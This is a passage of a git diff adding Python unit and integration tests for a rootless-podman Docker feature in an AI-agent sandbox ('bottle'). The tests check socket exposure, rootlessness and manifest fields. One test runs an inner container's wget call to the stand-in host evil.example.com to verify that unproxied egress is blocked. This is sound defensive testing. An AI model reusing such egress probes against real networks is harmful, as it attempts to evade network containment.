copy_cwd=True, + user_cwd=str(workspace), + ) + backend = get_bottle_backend("macos-container") + plan = backend.prepare(spec, stage_dir=stage) + with backend.launch(plan) as bottle: + workdir = plan.workspace_plan.workdir + checks = ( + "docker info >/dev/null && docker compose version && " + f"cd {workdir} && docker compose up -d --wait && " + "curl --fail --silent http://127.0.0.1:18080/ | " + "grep -q bottle-compose-ok" + ) + result = bottle.exec(checks) + self.assertEqual( + 0, result.returncode, + f"stdout={result.stdout!r}\nstderr={result.stderr!r}", + ) + # podman's compat API reports rootlessness through its own + # native endpoint; the Docker-shaped SecurityOptions field does + # not carry it. + inspect = bottle.exec( + "podman info --format '{{.Host.Security.Rootless}}'" + ) + self.assertIn("true", inspect.stdout.lower()) + self.assertEqual( + 0, + bottle.exec( + "test \"$(id -u)\" -ne 0" + ).returncode, + "the podman service must not be running as bottle root", + ) + self.assertNotEqual( + 0, + bottle.exec("test -S /var/run/docker.sock").returncode, + "spike must never expose a host/rootful Docker socket", + ) + # Asserted on an in-band marker, not on `docker run`'s exit + # code: podman 4.3.1's Docker-compat API swallows the + # container's status and returns 0 for everything, so an + # exit-code assertion here passes whether egress was blocked + # or wide open. That silent false pass is worse than no check + # at all, and it is exactly this check — the one proving a + # nested container cannot escape the egress path. + # + # busybox ships wget, so a failure here means egress was + # refused rather than the binary being absent. + direct = bottle.exec( + "docker run --rm --env HTTP_PROXY= --env HTTPS_PROXY= " + "--env http_proxy= --env https_proxy= " + "quay.io/prometheus/busybox sh -c " + "'wget -T 4 -qO- https://evil.example.com/ " + "&& echo ESCAPED || echo CONTAINED'" + ) + self.assertIn( + "CONTAINED", direct.stdout, + "an inner container obtained direct, unproxied egress: " + f"stdout={direct.stdout!r} stderr={direct.stderr!r}", + ) + self.assertNotIn("ESCAPED", direct.stdout) + finally: + shutil.rmtree(workspace, ignore_errors=True) + shutil.rmtree(stage, ignore_errors=True) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/unit/test_macos_container_launch_wiring.py b/tests/unit/test_macos_container_launch_wiring.py index 1763e5d..fbe12c9 100644 --- a/tests/unit/test_macos_container_launch_wiring.py +++ b/tests/unit/test_macos_container_launch_wiring.py @@ -22,6 +22,7 @@ from bot_bottle.backend.macos_container.launch import ( _agent_run_argv, _identity_proxy_env, ) +from bot_bottle.backend.macos_container.rootless_podman import guest_env from bot_bottle.manifest import ManifestIndex _BOTTLE = "bot_bottle.backend.macos_container.bottle" @@ -76,6 +77,7 @@ def _plan( ), agent_git_gate_url=agent_git_gate_url, agent_supervise_url=agent_supervise_url, + docker_access=False, )) @@ -178,6 +180,18 @@ class TestIdentityTokenDelivery(unittest.TestCase): self.assertNotIn("--env", argv) +class TestRootlessPodmanEnvironment(unittest.TestCase): + def test_disabled_bottle_gets_no_docker_environment(self) -> None: + self.assertEqual({}, guest_env(False)) + + def test_enabled_bottle_uses_only_guest_local_socket(self) -> None: + env = guest_env(True) + self.assertEqual( + "unix:///tmp/bot-bottle-podman-run/podman.sock", env["DOCKER_HOST"], + ) + self.assertNotIn("/var/run/docker.sock", " ".join(env.values())) + + class TestPlanIdentityToken(unittest.TestCase): """git-gate's gitconfig extraHeader and the supervise MCP --header read `getattr(plan, "identity_token", "")` at provision time and both bypass the diff --git a/tests/unit/test_macos_rootless_podman.py b/tests/unit/test_macos_rootless_podman.py new file mode 100644 index 0000000..4d24884 --- /dev/null +++ b/tests/unit/test_macos_rootless_podman.py @@ -0,0 +1,147 @@ +"""Unit coverage for the fail-closed macOS rootless-podman spike.""" + +from __future__ import annotations + +import unittest +from dataclasses import dataclass +from pathlib import Path +from types import SimpleNamespace +from typing import cast +from unittest.mock import patch + +from bot_bottle.backend.macos_container import rootless_podman +from bot_bottle.backend.macos_container import launch as launch_mod +from bot_bottle.backend.macos_container.bottle_plan import MacosContainerBottlePlan + + +class _Bottle: + def __init__(self, results: list[SimpleNamespace]) -> None: + self.results = results + self.commands: list[str] = [] + + def exec(self, command: str) -> SimpleNamespace: + self.commands.append(command) + return self.results.pop(0) + + +def _result(returncode: int, *, stdout: str = "", stderr: str = "") -> SimpleNamespace: + return SimpleNamespace(returncode=returncode, stdout=stdout, stderr=stderr) + + +@dataclass(frozen=True) +class _AgentProvision: + image: str + + +@dataclass(frozen=True) +class _Plan: + slug: str + image: str + dockerfile_path: str + docker_access: bool + agent_provision: _AgentProvision + + +class TestRootlessPodmanStart(unittest.TestCase): + def test_bootstraps_then_waits_for_guest_local_service(self) -> None: + bottle = _Bottle([_result(0), _result(1), _result(0)]) + with patch.object(rootless_podman.time, "sleep"): + rootless_podman.start(bottle) + self.assertIn("rootless-podman-init", bottle.commands[0]) + self.assertEqual(2, bottle.commands.count("docker info >/dev/null 2>&1")) + + def test_bootstrap_failure_is_fatal_without_privilege_fallback(self) -> None: + bottle = _Bottle([_result(1, stderr="slirp4netns missing")]) + with patch.object(rootless_podman, "die", side_effect=RuntimeError) as die: + with self.assertRaises(RuntimeError): + rootless_podman.start(bottle) + self.assertIn("slirp4netns missing", die.call_args.args[0]) + self.assertEqual(1, len(bottle.commands)) + + def test_timeout_reports_guest_log(self) -> None: + bottle = _Bottle( + [_result(0)] + + [_result(1) for _ in range(rootless_podman.READY_RETRIES)] + + [_result(0, stdout="operation not permitted")] + ) + with patch.object(rootless_podman.time, "sleep"), \ + patch.object(rootless_podman, "die", side_effect=RuntimeError) as die: + with self.assertRaises(RuntimeError): + rootless_podman.start(bottle) + self.assertIn("operation not permitted", die.call_args.args[0]) + + +class TestRootlessPodmanDevices(unittest.TestCase): + def test_relaxes_only_the_two_blocked_device_nodes_as_root(self) -> None: + calls: list[tuple[str, list[str]]] = [] + rootless_podman.prepare_guest_devices( + "bottle-1", lambda name, argv: calls.append((name, argv)), + ) + self.assertEqual(1, len(calls)) + name, argv = calls[0] + self.assertEqual("bottle-1", name) + self.assertIn("chmod 0666 /dev/fuse /dev/net/tun", argv[-1]) + + +class TestRootlessPodmanImage(unittest.TestCase): + def test_layers_tooling_without_changing_base_image(self) -> None: + calls: list[tuple[str, str, str]] = [] + + def build(image: str, context: str, *, dockerfile: str) -> None: + calls.append((image, context, dockerfile)) + text = Path(dockerfile).read_text(encoding="utf-8") + self.assertIn("FROM agent:base", text) + self.assertIn("podman fuse-overlayfs slirp4netns uidmap", text) + self.assertIn("USER node", text) + self.assertTrue((Path(context) / "rootless-podman-init.sh").is_file()) + + image = rootless_podman.build_image("agent:base", build) + self.assertEqual("agent:base-rootless-podman", image) + self.assertEqual("agent:base-rootless-podman", calls[0][0]) + + def test_strips_subordinate_ranges_so_podman_avoids_newuidmap(self) -> None: + """The single-UID fallback is the entire reason podman works here. + + A subordinate range would send podman down the newuidmap path, which + cannot write a multi-range uid_map without CAP_SYS_ADMIN in an Apple + Container guest — the failure that killed the rootless-Docker spike. + """ + seen: list[str] = [] + + def build(image: str, context: str, *, dockerfile: str) -> None: + seen.append(Path(dockerfile).read_text(encoding="utf-8")) + + rootless_podman.build_image("agent:base", build) + text = seen[0] + self.assertIn("sed -i '/^node:/d' /etc/subuid /etc/subgid", text) + self.assertNotIn("subuid", text.replace( + "sed -i '/^node:/d' /etc/subuid /etc/subgid", "", + )) + + def test_launch_builds_base_then_rootless_variant(self) -> None: + plan = cast(MacosContainerBottlePlan, cast(object, _Plan( + slug="dev-abc", + image="agent:base", + dockerfile_path="/repo/Dockerfile", + docker_access=True, + agent_provision=_AgentProvision(image="agent:base"), + ))) + with patch.object(launch_mod, "read_committed_image", return_value=None), \ + patch.object(launch_mod.container_mod, "build_image") as build, \ + patch.object( + launch_mod.rootless_podman, + "build_image", + return_value="agent:base-rootless-podman", + ) as build_rootless: + result = launch_mod._build_images(plan) # pylint: disable=protected-access + + build.assert_called_once_with( + "agent:base", launch_mod._REPO_DIR, # pylint: disable=protected-access + dockerfile="/repo/Dockerfile", + ) + build_rootless.assert_called_once_with("agent:base", build) + self.assertEqual("agent:base-rootless-podman", result.agent_provision.image) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/unit/test_manifest_bottle_merge.py b/tests/unit/test_manifest_bottle_merge.py index a0b3795..28e56db 100644 --- a/tests/unit/test_manifest_bottle_merge.py +++ b/tests/unit/test_manifest_bottle_merge.py @@ -56,6 +56,12 @@ class TestMergeBottlesRuntime(unittest.TestCase): result = merge_bottles_runtime([base, override]) self.assertFalse(result.supervise) + def test_docker_access_later_wins(self): + result = merge_bottles_runtime([ + _bottle(docker_access=False), _bottle(docker_access=True), + ]) + self.assertTrue(result.docker_access) + def test_three_bottles_merged_left_to_right(self): b1 = _bottle(env={"A": "1", "B": "1", "C": "1"}) b2 = _bottle(env={"B": "2", "C": "2"}) diff --git a/tests/unit/test_manifest_validation.py b/tests/unit/test_manifest_validation.py index a60ba14..04ec2a2 100644 --- a/tests/unit/test_manifest_validation.py +++ b/tests/unit/test_manifest_validation.py @@ -44,13 +44,20 @@ class TestBottleValidation(unittest.TestCase): with self.assertRaises(ManifestError): ManifestBottle.from_dict("b", {"supervise": "yes"}) + def test_docker_access_not_bool(self) -> None: + with self.assertRaises(ManifestError): + ManifestBottle.from_dict("b", {"docker_access": "yes"}) + def test_removed_runtime_field(self) -> None: with self.assertRaises(ManifestError): ManifestBottle.from_dict("b", {"runtime": "runsc"}) def test_valid_minimal(self) -> None: - b = ManifestBottle.from_dict("b", {"supervise": False, "env": {"X": "1"}}) + b = ManifestBottle.from_dict( + "b", {"supervise": False, "docker_access": True, "env": {"X": "1"}}, + ) self.assertFalse(b.supervise) + self.assertTrue(b.docker_access) self.assertEqual({"X": "1"}, dict(b.env))